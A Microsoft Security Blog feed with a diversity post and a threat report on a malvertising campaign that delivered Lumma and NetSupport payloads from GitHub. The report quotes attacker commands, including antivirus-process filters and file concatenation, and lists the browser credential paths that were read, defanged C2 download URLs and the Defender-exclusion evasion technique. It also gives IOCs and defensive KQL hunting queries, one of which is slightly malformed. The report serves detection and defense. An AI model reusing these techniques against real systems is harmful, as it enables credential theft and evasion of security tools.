Microsoft

Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before

Microsoft Malware Protection Center - Thu, 03/06/2025 - 4:00pm

This Women’s History Month serves as a crucial moment for us to lead and continue to pave the way for a more inclusive future. I am truly honored to support my amazing women colleagues who continue to excel in their careers and am grateful to have so many allies who have extended their hands to help guide and shape me to the person I am today.

Just last week I was in Tokyo for the Japan Security Forum, where Miki Tsusaka, the President of Microsoft Japan and I had a great conversation during a CyberWomen Asia fireside chat about the importance of women in cybersecurity. Following the chat was a panel discussion with Tsutaki-san, Security leader at Yamaha Motor Corporation and Debbie Furtado, one of our bright Principal group engineering managers. The event highlighted our different perspectives and talents which are invaluable to drive innovation and progress across various industries. I am proud to be a part of Microsoft Security, which is focused on building and nurturing an inclusive cybersecurity workforce and curating careers, tools, and resources that work for everyone. We recognize that this promotes business growth, strengthens global defenses, and enhances AI safety.

According to the World Economic Forum, gender equality in entrepreneurship drives economic growth and innovation.1 McKinsey and Company has also observed that closing the gender gap in employment and entrepreneurship could increase global GDP by 20%, and that organizations with 30% or more women on executive teams are 27% more likely to achieve higher profitability.2

For a better future we need everyone in the journey and this is particularly of significance in cybersecurity where we face a critical shortage of talent and where cyberthreat actors are from diverse backgrounds.

Cybersecurity Awareness

Empower everyone to be a cyber defender with resources and training curated by the security experts at Microsoft.

Learn more Addressing the skills gap in cybersecurity and AI

There is a significant talent gap in cybersecurity. The 2024 ISC2 Cybersecurity Workforce Study reports a global shortage of 4.7 million skilled workers.3 This worker shortage has been a significant challenge the past 12 months and is expected to continue for the next two years. To address this growing concern, we must embrace a wide range of perspectives and backgrounds to foster innovation and find more effective solutions to these challenges.

By incorporating individuals with varied perspectives, experiences, and approaches within the cybersecurity workforce, we can enhance problem-solving capabilities and enhance strategic defenses.

Cybercriminals come from various cultures and backgrounds, bringing different perspectives. Security professionals with varied backgrounds and perspectives can provide creative approaches and unique insights to counter these cyberthreats. Likewise, for AI, having different backgrounds and perspectives help with AI safety and biases.

Continue to deepen expertise and invite different perspectives

While progress has been made in creating opportunities for women in cybersecurity, significant work remains to remove entry barriers. It is essential to continue our efforts to improve representation in cybersecurity by creating new pathways and gaining support from more allies. I wholeheartedly encourage you to actively contribute to this objective through the many organizations and programs available and by doing the following:

Share the accomplishments of meaningful role models with a wide range of experiences and perspectives.
Adjust job requirements to remove potential biases.
Offer inclusive training that encourages professionals, particularly those in their early careers, and encourage them to advance their skills in cybersecurity.
Volunteer for educational programs that include cybersecurity and AI training.
Reach out to community groups that advocate for mentorship opportunities.
Act as an ally and create opportunities for those interested in cybersecurity careers, such as by encouraging them to participate and speak up and introducing them to peers.

Security should be for all and we are all in this together. Together, we can enhance the global security workforce and contribute to a promising future.

Register for our upcoming panel “Harnessing Diversity – Strengthening the Cybersecurity Workforce in the Age of AI” and visit Microsoft’s cybersecurity awareness page for resources and training provided by Microsoft security experts, enabling everyone in your organization to become a cyber defender. Let us all acknowledge the importance of diversity in cybersecurity and its critical role in safeguarding our future and shaping a history we can be proud of.

To learn more about Microsoft Security solutions, visit our website. Bookmark the Security blog to keep up with our expert coverage on security matters. Also, follow us on LinkedIn (Microsoft Security) and X (@MSFTSecurity) for the latest news and updates on cybersecurity.

1Advancing gender parity in entrepreneurship: strategies for a more equitable future, World Economic Forum. January 20, 2025.

2Diversity matters even more: The case for holistic impact, McKinsey and Company. December 5, 2023.

32024 ISC2 Cybersecurity Workforce Study, ISC2. October 31, 2024.

The post Women’s History Month: Why different perspectives in cybersecurity and AI matter more than ever before appeared first on Microsoft Security Blog.

Categories: Microsoft

Malvertising campaign leads to info stealers hosted on GitHub

Microsoft Malware Protection Center - Thu, 03/06/2025 - 12:00pm

In early December 2024, Microsoft Threat Intelligence detected a large-scale malvertising campaign that impacted nearly one million devices globally in an opportunistic attack to steal information. The attack originated from illegal streaming websites embedded with malvertising redirectors, leading to an intermediary website where the user was then redirected to GitHub and two other platforms. The campaign impacted a wide range of organizations and industries, including both consumer and enterprise devices, highlighting the indiscriminate nature of the attack.

Learn more about this malvertising campaign's multi-stage attack chain

Listen to the Microsoft Threat Intelligence podcast

GitHub was the primary platform used in the delivery of the initial access payloads and is referenced throughout this blog post; however, Microsoft Threat Intelligence also observed one payload hosted on Discord and another hosted on Dropbox.

The GitHub repositories, which were taken down, stored malware used to deploy additional malicious files and scripts. Once the initial malware from GitHub gained a foothold on the device, the additional files deployed had a modular and multi-stage approach to payload delivery, execution, and persistence. The files were used to collect system information and to set up further malware and scripts to exfiltrate documents and data from the compromised host. This activity is tracked under the umbrella name Storm-0408 that we use to track numerous threat actors associated with remote access or information-stealing malware and who use phishing, search engine optimization (SEO), or malvertising campaigns to distribute malicious payloads.

In this blog, we provide our analysis of this large-scale malvertising campaign, detailing our findings regarding the redirection chain and various payloads used across the multi-stage attack chain. We further provide recommendations for mitigating the impact of this threat, detection details, indicators of compromise (IOCs), and hunting guidance to locate related activity. By sharing this research, we aim to raise awareness about the tactics, techniques, and procedures (TTPs) used in this widespread activity so organizations can better prepare and implement effective mitigation strategies to protect their systems and data.

We would like to thank the GitHub security team for their prompt response and collaboration in taking down the malicious repositories.

GitHub activity and redirection chain

Since at least early December 2024, multiple hosts downloaded first-stage payloads from malicious GitHub repositories. The users were redirected to GitHub through a series of other redirections. Analysis of the redirector chain determined the attack likely originated from illegal streaming websites where users can watch pirated videos. The streaming websites embedded malvertising redirectors within movie frames to generate pay-per-view or pay-per-click revenue from malvertising platforms. These redirectors subsequently routed traffic through one or two additional malicious redirectors, ultimately leading to another website, such as a malware or tech support scam website, which then redirected to GitHub.

Multiple stages of malware were deployed in this campaign, as listed below, and the several different stages of activity that occurred depended on the payload dropped during the second stage.

The first-stage payload that was hosted on GitHub served as the dropper for the next stage of payloads.
The second-stage files were used to conduct system discovery and to exfiltrate system information that was Base64-encoded into the URL and sent over HTTP to an IP address. The information collected included data on memory size, graphic details, screen resolution, operating system (OS), and user paths.
Various third-stage payloads were deployed depending on the second-stage payload. In general, the third-stage payload conducted additional malicious activities such as command and control (C2) to download additional files and to exfiltrate data, as well as defense evasion techniques.

The full redirect chain was composed of four to five layers. Microsoft researchers determined malvertising redirectors were contained within an iframe on illegal streaming websites.

Figure 1. Code from website of streaming video and iframe showing malvertising redirector URL

There were several redirections that occurred before arriving at the malicious content stored on GitHub.

Figure 2. Redirection chain from pirate streaming website to malware files on GitHub Attack chain

Once the redirection to GitHub occurred, the malware hosted on GitHub established the initial foothold on the user’s device and functioned as a dropper for additional payload stages and running malicious code. The additional payloads included information stealers to collect system and browser information on the compromised device, of which most were either Lumma stealer or an updated version of Doenerium. Depending on the initial payload, the deployment of NetSupport, a remote monitoring and management (RMM) software, was also often deployed alongside the infostealer. Besides the information stealers, PowerShell, JavaScript, VBScript, and AutoIT scripts were run on the host. The threat actors incorporated use of living-off-the-land binaries and scripts (LOLBAS) like PowerShell.exe, MSBuild.exe, and RegAsm.exe for C2 and data exfiltration of user data and browser credentials.

After the initial foothold was gained, the activity led to a modular and multi-stage approach to payload delivery, execution, and persistence. Each stage dropped another payload with a different function, as outlined below. Actions conducted across these stages include system discovery (memory, GPU, OS, signed-in users, and others), opening browser credential files, Data Protection API (DPAPI) crypt data calls, and other functions such as obfuscated script execution and named pipe creations to conduct data exfiltration. Persistence was achieved through modification of the registry run keys and the addition of a shortcut file to the Windows Startup folder.

Several stages of malicious activity to conduct deployment of additional malware, collections, and exfiltration of data to a C2 were observed. While not every single initial payload followed these exact steps, this is an overall view of what occurred across most incidents analyzed:

Figure 3. General depiction of the four stages First-stage payload: Establishing a foothold on the host

During the first stage, a payload is dropped onto the user’s device from the binary hosted on GitHub, establishing a foothold on that device. As of mid-January 2025, the first-stage payloads discovered were digitally signed with a newly created certificate. A total of twelve different certificates were identified, all of which have been revoked.

Most of these initial payloads dropped the following legitimate files to leverage their functionality. These files were either leveraged by the first-stage payload or by later-stage payloads, depending on the actions being conducted.

File nameFunctionapp-64.7zThis is a compressed archive that stores the second-stage payload and additional dropped files.app.asarThis is an archive file specific to Electron applications, which are directly installed programs.d3dcompiler_47.dllThis file is often included in DirectX redistributables, which are commonly bundled with Microsoft installers for games and graphics applications.elevate.exeThis file is used by various installers and scripts to run processes with elevated privileges, not specific to Microsoft.ffmpeg.dllThis file is associated with FFmpeg, a popular multimedia framework used to handle video, audio, and other multimedia files and streams.libEGL.dllThis file is part of the ANGLE project, which is often found in applications that use OpenGL Embedded Systems (ES), including some web browsers and games.libEGLESv2.dllThis file is part of the ANGLE project, which is often found in applications that use OpenGL ES, including some web browsers and games.LICENSES.chromium.htmlThis file could contain information about the system or browser.nsis7z.dllThis file is associated with the plugins for the Nullsoft Scriptable Install System (NSIS), which is used to create installers for various software.StdUtils.dllThis file is associated with the plugins for the NSIS.System.dllThis file is part of the .NET Framework assembly, typically included in Microsoft installers for applications that rely on the .NET Framework.vk_swiftshader.dllThis file is associated with SwiftShader, which is used in applications that need a CPU-based implementation of the Vulkan API.vulkan-1.dllThis file is associated with applications that use the Vulkan Graphics API, such as games and graphics software.

Depending on the first-stage payload that was initially established on the compromised device, Microsoft observed different second-stage payloads and several different methods for delivering these payloads to the device.

Second-stage payload: System discovery, collection, and exfiltration

The main purpose of the second-stage payload is to conduct system discovery and collect that data for exfiltration to the C2. The system information collected includes data such as memory size, graphic card details, screen resolution, operating system, user paths, and a reference to the second-stage payload’s file name.

This was accomplished by querying the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\ProductName for the Windows OS version and running commands, such as the echo command, to gather the device’s name (%COMPUTERNAME%) and domain name (%USERDOMAIN%).

System data collected by the second-stage payload is Base64-encoded and exfiltrated as a query parameter to an IP address.

Figure 4. Typical format of the URL observed when exfiltrating information collected from the compromised device Third-stage payload: PowerShell and .exe binary

Depending on the second-stage payload, either one or multiple executables are dropped onto the compromised device, and sometimes an accompanying encoded PowerShell script. These files initiate a chain of events that conduct command execution, payload delivery, defensive evasion, persistence, C2 communications, and data exfiltration. The analysis of the dropped executables is first discussed below, followed by review of the PowerShell scripts observed.

Third-stage .exe analysis

The second-stage payloads run the dropped third-stage executables using the command prompt (for example, cmd.exe /d /s /c “”C:\Users\<user>\AppData\Local\Temp\ApproachAllan.exe””). The /c flag ensures that the command runs and exits quickly. When the third-stage .exe runs, it drops a command file (.cmd) and launches it using the command prompt (for example, “cmd.exe” /c copy Beauty Beauty.cmd && Beauty.cmd). The .cmd file performs several actions, such as running tasklist, to initiate the discovery of running programs. This is followed by the findstr to search for keywords associated with security software:

findstr keywordAssociated softwarewrsaWebroot SecureAnywhereopssvcQuick HealAvastUIAvast AntivirusAVGUIAVG AntivirusbdservicehostBitdefender AntivirusnsWscSvcNorton SecurityekrnESETSophosHealthSophos

The .cmd file also concatenates multiple files into one with a single character file name: “cmd /c copy /b ..\Verzeichnis + ..\Controlling + ..\Constitute + ..\Enjoyed + ..\Confusion + ..\Min +..\Statutory J”. This single character filename is used next.

Following this, the third-stage .exe produces an AutoIT v3 interpreter file that is renamed from the typical file name of AutoIt3.exe and uses a .com file extension. The .cmd file initiates the execution of the .com file against the single character binary (such as Briefly.com J). Note, most of the second-stage payloads follow this progression chain, and as mentioned a second-stage payload can also drop multiple executables, all following the same process. For example:

First stage

X-essentiApp.exe

Second stage

Ionixnignx.exe

Third stage

EverybodyViewing.exe
ReliefOrganizational.exe
InflationWinston.exe

Third-stage command files

Beauty.cmd
Possess.cmd
Villa.cmd

Fourth-stage AutoIT .com files

Alexandria.com
Kills.com
Briefly.com

We observed multiple .com files originating from different dropped executables, each performing distinct functions while occasionally overlapping in behavior. These files facilitate persistence, process injection, remote debugging, and data exfiltration through various mechanisms. One .com file, such as Alexandria.com, drops a .scr file (another renamed AutoIT interpreter), and a .js (JavaScript) file with the same name as the .scr file. The purpose of the JavaScript file is to ensure persistence by creating a .url internet shortcut that points to the JavaScript file and is placed in the Startup folder, ensuring that the .scr file executes when the .js file executes (through Wscript.exe) upon user sign-in. Alternatively, persistence can be achieved using scheduled task creation. The .scr file can initiate C2 connections, enable remote debugging on Chrome or Edge within a hidden desktop session, or create TCP listening sockets on ports 9220-9229. This functionality allows threat actors to monitor browsing activity and interact with an active browser instance. These files can also open sensitive data files, indicating their role in facilitating post-exploitation activities.

Another .com file, such as affiliated.com, also focuses on remote debugging and browser monitoring. In addition to remote monitoring, affiliated.com initiates network connections to Telegram, Let’s Encrypt, and threat actor domains, potentially for C2 or exfiltration. It also accesses DPAPI to decrypt sensitive stored credentials and retrieve browser data.

The final observed .com file, such as Briefly.com, exhibits behavior similar to affiliated.com but extends its capabilities to include screenshot capture, data exfiltration, and PowerShell-based execution. This file accesses browser and user data for collection, establishes connections to Pastebin and additional C2 domains, and drops the fourth-stage PowerShell script.

The order in which these .com files run is not strictly defined, as one or multiple files can perform overlapping functions depending on the third-stage payload. In many cases, the .com files also leverage LOLBAS like RegAsm.exe by dropping a legitimate file into the %TEMP% directory or injecting malicious code into it using NtAllocateVirtualMemory and SetThreadContext API function calls. RegAsm.exe is used to establish C2 connections over TCP ports 15647 or 9000, exfiltrating data, accessing DPAPI for decryption, monitoring keystrokes using the WH_KEYBOARD_LL hook, and more. This flexibility in execution allows threat actors to tailor their approach based on environmental factors, such as security configurations and user activity.

Browser data files seen accessed:

\AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\cookies.sqlite
\AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\formhistory.sqlite
\AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\key4.db
\AppData\Roaming\Mozilla\Firefox\Profiles\<user profile uid>.default-release\logins.json
\AppData\Local\Google\Chrome\User Data\Default\Web Data
\AppData\Local\Google\Chrome\User Data\Default\Login Data
\AppData\Local\Microsoft\Edge\User Data\Default\Login Data

User data file paths seen accessed:

C:\\Users\<user>\\OneDrive
C:\\Users\<user>\\Documents
C:\\Users\<user>\\Downloads

Third-stage PowerShell analysis

If a PowerShell script is also dropped by the second-stage payload, it includes Base64-obfuscated commands to conduct actions, such as use curl to download additional files like NetSupport from the C2, create persistence for the NetSupport RAT, and exfiltrate system information to C2 servers. To ensure no errors or the progress meter is displayed on the compromised device, the curl command is often used with the –silent option when downloading files from the C2. PowerShell is often configured to run without restrictions with the -ExecutionPolicy Bypass parameter.

As an example, in some of the incidents, when the second-stage payload runs, a PowerShell script is dropped and executed. The script sends the compromised device’s name to the C2 and downloads NetSupport RAT from the same C2.

Second-stage payload: Squarel.exe
PowerShell script: SHA-256: d70ccae7914fc8c36c9e11b2a7f10bebd7f5696e78d8836554f4990b0f688dbb
C2 domain: keikochio[.]com
NetSupport RAT: SHA-256: 32a828e2060e92b799829a12e3e87730e9a88ecfa65a4fc4700bdcc57a52d995

In another case, a second-stage payload drops a PowerShell script, which connects to hxxps://ipinfo[.]io to gather the compromised device’s external-facing IP address. This information is sent to a Telegram chat, then drops presentationhost.exe (a renamed NetSupport binary) and remcmdstub.exe (NetSupport Command Manager) into the %TEMP% directory. Finally, the PowerShell script establishes persistence for presentationhost.exe by adding it to the auto-start extensibility points (ASEP) registry keys. When it runs, the NetSupport RAT connects to the C2 and captures a screenshot of the compromised device’s desktop. It also delivers a Lumma executable that drops a VBScript file with the same name. The VBScript file runs encoded PowerShell to initiate C2 connections and launches MSBuild.exe to enable Chrome remote debugging on a hidden desktop. Additionally, presentationhost.exe initiates remcmdstub.exe, which leverages iScrPaint.exe (iTop Screen Recorder) to run MSBuild.exe and access browser credential files for exfiltration. The iScrPaint.exe file also establishes persistence by placing a .lnk shortcut in the Windows Startup folder, ensuring it runs on system reboot.

Second-stage payload: Application.exe
PowerShell script: SHA-256: 483796a64f004a684a7bc20c1ddd5c671b41a808bc77634112e1703052666a64
C2: hxxp://5.10.250[.]240/fakeurl.htm

The last observed third-stage PowerShell script was dropped by three second-stage payloads. The script sends the compromised device’s name to the C2 server. It then changes the working directory to $env:APPDATA, before using Start-BitsTransfer to download NetSupport from the C2. To evade detection, it modifies system security settings forcing TLS1.2 for encrypted C2 communication. These files are extracted into a newly created WinLibraryClient directory under AppData and then are launched. The script establishes persistence for the client32.exe (NetSupport RAT) by modifying the ASEP registry. Client32.exe initiates C2 connections to hxxp://79.132.128[.]77/fakeurl.htm.

Second-stage payloads: SalmonSamurai.exe, LakerBaker.exe, and DisplayPhotoViewer.exe
PowerShell script: SHA-256: 670218cfc5c16d06762b6bc74cda4902087d812e72c52d6b9077c4c4164856b6
C2 domain: stocktemplates[.]net

Additionally, one observed execution included registry enumeration of HKCU:\Software\Microsoft\Windows\CurrentVersion\Uninstall\ to identify installed applications and security software. It also queries the system’s domain status using Windows Management Instrumentation (WMI) and scans for cryptocurrency wallets, including Ledger Live, Trezor Suite, KeepKey, BCVault, OneKey, and BitBox, indicating potential financial data theft.

Fourth-stage PowerShell analysis

Depending on the .com file that ran (like Briefly.com), the renamed AutoIT file may drop a PowerShell script (SHA-256: 2a29c9904d1860ea3177da7553c8b1bf1944566e5bc1e71340d9e0ff079f0bd3). The obfuscated PowerShell code uses the Add-MpPreference cmdlet to modify Microsoft Defender to add in exclusion paths for Microsoft Defender, so the specified folders are not scanned.

Figure 5. Deobfuscated commands to add exclusion paths to Windows Defender

The script above is sometimes followed by an instance of Base64-encoded PowerShell commands. The PowerShell commands perform the following actions:

Sends a web request to hxxps://360[.]net and closes the response.
Sends a web request to hxxps://baidu[.]com and closes the response.
Downloads data from hxxps://klipcatepiu0[.]shop/int_clp_sha.txt using a web client.
Writes the downloaded data to a memory stream and saves it as a .zip file named null.zip (SHA-256: f07b8e5622598c228bfc9bff50838a3c4fffd88c436a7ef77e6214a40b0a2bae) in the C:\Users\<Username>\AppData\Local\Temp directory.

Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat.

Strengthen Microsoft Defender for Endpoint configuration

Ensure that tamper protection is enabled in Microsoft Defender for Endpoint.
Enable network protection in Microsoft Defender for Endpoint.
Turn on web protection.
Run endpoint detection and response (EDR) in block mode so that Microsoft Defender for Endpoint can block malicious artifacts, even when your non-Microsoft antivirus does not detect the threat or when Microsoft Defender Antivirus is running in passive mode. EDR in block mode works behind the scenes to remediate malicious artifacts that are detected post-breach.
Configure investigation and remediation in full automated mode to let Microsoft Defender for Endpoint take immediate action on alerts to resolve breaches, significantly reducing alert volume. 
Microsoft Defender XDR customers can turn on the following attack surface reduction rules to prevent common attack techniques used by threat actors.
- Block executable files from running unless they meet a prevalence, age, or trusted list criterion
- Block execution of potentially obfuscated scripts
- Block JavaScript or VBScript from launching downloaded executable content
- Block process creations originating from PSExec and WMI commands
- Block credential stealing from the Windows local security authority subsystem
- Block use of copied or impersonated system tools

Strengthen operating environment configuration

Require multifactor authentication (MFA). While certain attacks such as adversary-in-the-middle (AiTM) phishing attempt to circumvent MFA, implementation of MFA remains an essential pillar in identity security and is highly effective at stopping a variety of threats.
- Leverage phishing-resistant authentication methods such as FIDO Tokens, or Microsoft Authenticator with passkey. Avoid telephony-based MFA methods to avoid risks associated with SIM-jacking.
Implement Entra ID Conditional Access authentication strength to require phishing-resistant authentication for employees and external users for critical apps.
Encourage users to use Microsoft Edge and other web browsers that support Microsoft Defender SmartScreen, which identifies and blocks malicious websites, including phishing sites, scam sites, and sites that host malware.
Enable Network Level Authentication for Remote Desktop Service connections.
Enable Local Security Authority (LSA) protection to block credential stealing from the Windows local security authority subsystem.
AppLocker can restrict specific software tools prohibited within the organization, such as reconnaissance, fingerprinting, and RMM tools, or grant access to only specific users.

Microsoft Defender XDR detections

Microsoft Defender XDR customers can refer to the list of applicable detections below. Microsoft Defender XDR coordinates detection, prevention, investigation, and response across endpoints, identities, email, apps to provide integrated protection against attacks like the threat discussed in this blog.

Customers with provisioned access can also use Microsoft Security Copilot in Microsoft Defender to investigate and respond to incidents, hunt for threats, and protect their organization with relevant threat intelligence.

Microsoft Defender Antivirus

Microsoft Defender Antivirus detects threat components as the following malware:

Microsoft Defender for Endpoint

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

Possible theft of passwords and other sensitive web browser information
Possible Lumma Stealer activity
Renamed AutoIt tool
Use of living-off-the-land binary to run malicious code
Suspicious startup item creation
Suspicious Scheduled Task Process Launched
Suspicious DPAPI Activity
Suspicious implant process from a known emerging threat
Security software tampering
Suspicious activity linked to a financially motivated threat actor detected
Ransomware-linked threat actor detected
A file or network connection related to a ransomware-linked emerging threat activity group detected
Information stealing malware activity
Possible NetSupport Manager activity
Suspicious sequence of exploration activities
Defender detection bypass
Suspicious Location of Remote Management Software
A process was injected with potentially malicious code
Process hollowing detected
Suspicious PowerShell download or encoded command execution
Suspicious PowerShell command line
Suspicious behavior by cmd.exe was observed
Suspicious Security Software Discovery
Suspicious discovery indicative of Virtualization/Sandbox Evasion
A process was launched on a hidden desktop
Monitored keystrokes
Suspicious Process Discovery
Suspicious Javascript process
A suspicious file was observed
Anomaly detected in ASEP registry

Microsoft Defender for Cloud

The following alerts might indicate threat activity associated with this threat. These alerts, however, can be triggered by unrelated threat activity.

Detected suspicious combination of HTA and PowerShell
Suspicious PowerShell Activity Detected
Traffic detected from IP addresses recommended for blocking
Attempted communication with suspicious sinkholed domain
Communication with suspicious domain identified by threat intelligence
Detected obfuscated command line
Detected suspicious named pipe communications

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

Incident investigation
Microsoft User analysis
Threat actor profile
Threat Intelligence 360 report based on MDTI article
Vulnerability impact assessment

Note that some promptbooks require access to plugins for Microsoft products such as Microsoft Defender XDR or Microsoft Sentinel.

Threat intelligence reports

Microsoft Defender Threat Intelligence

Microsoft Security Copilot customers can also use the Microsoft Security Copilot integration in Microsoft Defender Threat Intelligence, either in the Security Copilot standalone portal or in the embedded experience in the Microsoft Defender portal to get more information about this threat actor.

Hunting queries Microsoft Defender XDR

Microsoft Defender XDR customers can run the following query to find related activity in their networks:

Github-hosted first-stage payload certificate serial numbers

let specificSerialNumbers = dynamic(["70093af339876742820d7941", "15042512e67e8275f3f7f36b", "5608cab7e2ce34d53abcbb73", "0fa27d2553f24da79d1cc6bd8773ee9a", "7a7bf2ae0cbc0f5500db2946", "30d6c83a715bddb32e7956fe52d6b352", "301385aa36fae635e74bb88e", "30013cbbb16a7fd3c57f82707fb99c32", "5d00264a6b804ae6b28d9b16", "3a9c76f8304f77bd271921d9982f1ab6", "01f2c6c363767056abd80e9c", "0b09c88c0c8d15bed51a9eb4440f4bb0"]); union ( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp ), ( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate )

Dropbox-hosted first-stage payload certificate serial number

Surface devices that may contain first-stage payloads hosted on Dropbox related to this activity. This query will search for the unique serial number of the known certificate related to this activity.

let specificSerialNumbers = dynamic(["7a7bf2ae0cbc0f5500db2946"]); union ( DeviceFileCertificateInfo | where CertificateSerialNumber in (specificSerialNumbers) | project DeviceName, CertificateSerialNumber, Signer, SHA1, IsSigned, Issuer, Timestamp ), ( DeviceTvmCertificateInfo | where SerialNumber in (specificSerialNumbers) | project DeviceId, SerialNumber, SignatureAlgorithm, Thumbprint, Path, IssueDate, ExpirationDate )

Second-stage C2 IP addresses

Surface devices that may have communicated with second stage C2 IP addresses related to this activity.

let ipAddressToSearch = dynamic(["159.100.18.192", "192.142.10.246", "79.133.46.35", "84.200.24.191", "84.200.24.26", "89.187.28.253", "185.92.181.1"]); union isfuzzy=true ( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, conditions_destinationIP_s), AdditionalInfo = tostring(AdditionalFields) ), ( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query ), ( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent ), ( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName ), ( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent ), ( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine ), ( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType ), ( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent ), ( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent ) | sort by Timestamp desc

Fourth-stage C2 IP addresses

Surface devices that may have communicated with fourth stage C2 IP addresses related to this activity.

let ipAddressToSearch = dynamic(["45.141.84.60", "91.202.233.18", "154.216.20.131", "5.10.250.240", "79.132.128.77"]); union isfuzzy=true ( AzureDiagnostics | where identity_claim_ipaddr_s == ipAddressToSearch or conditions_sourceIP_s == ipAddressToSearch or CallerIPAddress == ipAddressToSearch or clientIP_s == ipAddressToSearch or clientIp_s == ipAddressToSearch or primaryIPv4Address_s == ipAddressToSearch or conditions_destinationIP_s == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AzureDiagnostics", IPAddress = coalesce(identity_claim_ipaddr_s, conditions_sourceIP_s, CallerIPAddress, clientIP_s, clientIp_s, primaryIPv4Address_s, o), ( IdentityQueryEvents | where IPAddress == ipAddressToSearch or DestinationIPAddress == ipAddressToSearch | project Timestamp, Table = "IdentityQueryEvents", IPAddress = coalesce(IPAddress, DestinationIPAddress), AdditionalInfo = Query ), ( AADSignInEventsBeta | where IPAddress == ipAddressToSearch | project Timestamp, Table = "AADSignInEventsBeta", IPAddress, AdditionalInfo = UserAgent ), ( Heartbeat | where ComputerIP == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "Heartbeat", IPAddress = ComputerIP, AdditionalInfo = OSName ), ( CloudAppEvents | where IPAddress == ipAddressToSearch | project Timestamp, Table = "CloudAppEvents", IPAddress, AdditionalInfo = UserAgent ), ( DeviceNetworkEvents | where LocalIP == ipAddressToSearch or RemoteIP == ipAddressToSearch | project Timestamp, Table = "DeviceNetworkEvents", IPAddress = coalesce(LocalIP, RemoteIP), AdditionalInfo = InitiatingProcessCommandLine ), ( AADUserRiskEvents | where IpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADUserRiskEvents", IPAddress = IpAddress, AdditionalInfo = RiskEventType ), ( AADNonInteractiveUserSignInLogs | where IPAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "AADNonInteractiveUserSignInLogs", IPAddress, AdditionalInfo = UserAgent ), ( MicrosoftAzureBastionAuditLogs | where TargetVMIPAddress == ipAddressToSearch or ClientIpAddress == ipAddressToSearch | project Timestamp = TimeGenerated, Table = "MicrosoftAzureBastionAuditLogs", IPAddress = coalesce(TargetVMIPAddress, ClientIpAddress), AdditionalInfo = UserAgent ) | sort by Timestamp desc

Browser remote debugging

Identify AutoIT scripts launching chromium-based browsers (such as chrome.exe, msedge.exe, brave.exe) in remote debugging mode.

DeviceProcessEvents | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" // Check for "AutoIt" scripts, even if it's renamed. | where ProcessCommandLine has "--remote-debugging-port" // Identify Chromium based browsers (chrome.exe, msedge.exe, brave.exe etc) being launched in remote debugging mode. | project DeviceId, Timestamp, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessFolderPath, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, FileName, ProcessCommandLine

DPAPI decryption via AutoIT

Identify DPAPI decryption activity originating from AutoIT scripts.

DeviceEvents | where ActionType == "DpapiAccessed" | where InitiatingProcessVersionInfoInternalFileName == "AutoIt3.exe" | where (AdditionalFields has_any("Google Chrome", "Microsoft Edge") and AdditionalFields has_any("SPCryptUnprotect")) | extend json = parse_json(AdditionalFields) | extend dataDesp = tostring(json.DataDescription.PropertyValue) | extend opType = tostring(json.OperationType.PropertyValue) | where (dataDesp in~ ("Google Chrome", "Microsoft Edge") and opType =~ "SPCryptUnprotect") | project Timestamp, ReportId, DeviceId, ActionType, InitiatingProcessParentFileName, InitiatingProcessFileName, InitiatingProcessVersionInfoInternalFileName, InitiatingProcessCommandLine, AdditionalFields, dataDesp, opType

DPAPI decryption via LOLBAS binaries

Identify DPAPI decryption activity originating from LOLBAS binaries (RegAsm.exe and MSBuild.exe).

